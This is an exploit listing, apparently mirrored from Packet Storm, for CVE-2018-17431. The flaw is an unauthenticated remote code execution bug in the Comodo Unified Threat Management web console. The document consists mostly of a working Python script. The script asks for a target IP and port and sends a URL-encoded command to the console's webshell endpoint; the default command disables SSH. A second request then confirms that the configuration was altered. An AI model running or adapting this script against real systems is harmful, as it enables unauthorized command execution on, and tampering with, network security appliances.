Exploit for Comodo Unified Threat Management Web Console 2.7.0 Remote Code Execution CVE-2018-17431

## https://sploitus.com/exploit?id=PACKETSTORM:159246
# Exploit Title: Comodo Unified Threat Management Web Console 2.7.0 - Remote Code Execution  
# Date: 2018-08-15  
# Exploit Author: Milad Fadavvi  
# Author's LinkedIn: https://www.linkedin.com/in/fadavvi/  
# Vendor Homepage: https://www.comodo.com/  
# Version: Releases before 2.7.0 & 1.5.0   
# Tested on: Windows=Firefox/chrome - Kali=firefox  
# PoC & other infos: https://github.com/Fadavvi/CVE-2018-17431-PoC  
# CVE : CVE-2018-17431  
# CVE-detailes: https://nvd.nist.gov/vuln/detail/CVE-2018-17431  
# CVSS 3 score: 9.8   
  
import requests  
  
def RndInt(Lenght):  
from random import choice  
from string import digits  
  
RandonInt = ''.join([choice(digits) for n in range(Lenght)])  
return str(RandonInt)  
  
if __name__ == "__main__":  
  
IP = input("IP: ")  
Port = input("Port: ")  
  
Command = '%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a' ## Disable SSH  
'''For more info about command try to read manual of spesefic version of Comodo UTM and   
exploit PoC (https://github.com/Fadavvi/CVE-2018-17431-PoC)  
'''  
  
BaseURL = "https://" + IP + ":" + Port + "/manage/webshell/u?s=" + RndInt(1) + "&w=" + RndInt(3) +"&h=" + RndInt(2)  
BaseNComdURL = BaseURL + "&k=" + Command  
LastPart = "&l=" + RndInt(2) +"&_=" + RndInt(13)   
FullURL = BaseNComdURL + LastPart  
AddetionalEnter = BaseURL + "&k=%0a" + LastPart  
  
try:  
FirstResponse = requests.get(FullURL).text  
except:  
print('\nExploit failed due HTTP Error. Check given URL and Port!\n')  
exit(1)  
  
SecondResponse = requests.get(AddetionalEnter).text  
if SecondResponse.find("Configuration has been altered") == -1:  
print("\nExploit Failed!\n")  
exit(1)  
else:  
print("\nOK! Command Ran!\n")  
exit(0)